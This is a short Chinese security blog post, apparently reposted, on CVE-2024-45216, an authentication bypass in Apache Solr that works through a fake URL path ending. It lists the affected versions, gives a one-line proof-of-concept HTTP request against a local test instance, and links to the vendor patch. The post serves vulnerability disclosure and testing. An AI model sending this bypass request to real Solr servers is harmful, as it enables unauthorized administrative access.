Apache Solr身份认证绕过漏洞(CVE-2024-45216)

admin 2024年10月31日18:45:52评论15 views字数 651阅读2分10秒阅读模式
网安引领时代,弥天点亮未来

Apache Solr身份认证绕过漏洞(CVE-2024-45216)
0x00写在前面

      本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!

Apache Solr身份认证绕过漏洞(CVE-2024-45216)
0x01漏洞介绍
Apache Solr身份认证绕过漏洞(CVE-2024-45216)

Apache Solr是美国阿帕奇(Apache)基金会的一款基于Lucene(一款全文搜索引擎)的搜索服务器。该产品支持层面搜索、垂直搜索、高亮显示搜索结果等。

Apache Solr 5.3.0至8.11.4之前版本和9.0.0至9.7.0之前版本存在安全漏洞,该漏洞源于存在身份验证不当漏洞,从而可使用虚假URL路径结尾绕过身份验证。

Apache Solr身份认证绕过漏洞(CVE-2024-45216)
0x02影响版本
5.3.0 <= Apache Solr < 8.11.4
9.0.0 <= Apache Solr < 9.7.0

Apache Solr身份认证绕过漏洞(CVE-2024-45216)

Apache Solr身份认证绕过漏洞(CVE-2024-45216)
0x03漏洞复现

1.访问漏洞环境Apache Solr身份认证绕过漏洞(CVE-2024-45216)

2.对漏洞进行复现

POC 

漏洞复现

GET /solr/admin/info/properties:/admin/info/key HTTP/1.1Host: 127.0.0.1SolrAuth: XXXXX

      测试,通过响应判断漏洞存在。

Apache Solr身份认证绕过漏洞(CVE-2024-45216)

3.nuclei文件测试

Apache Solr身份认证绕过漏洞(CVE-2024-45216)

Apache Solr身份认证绕过漏洞(CVE-2024-45216)
0x04修复建议
目前厂商已发布升级补丁以修复漏洞,补丁获取链接:

https://solr.apache.org/security.html#cve-2024-45216-apache-solr-authentication-bypass-possible-using-a-fake-url-path-ending

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月31日18:45:52
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Apache Solr身份认证绕过漏洞(CVE-2024-45216)https://cn-sec.com/archives/3338187.html

发表评论

匿名网友 填写信息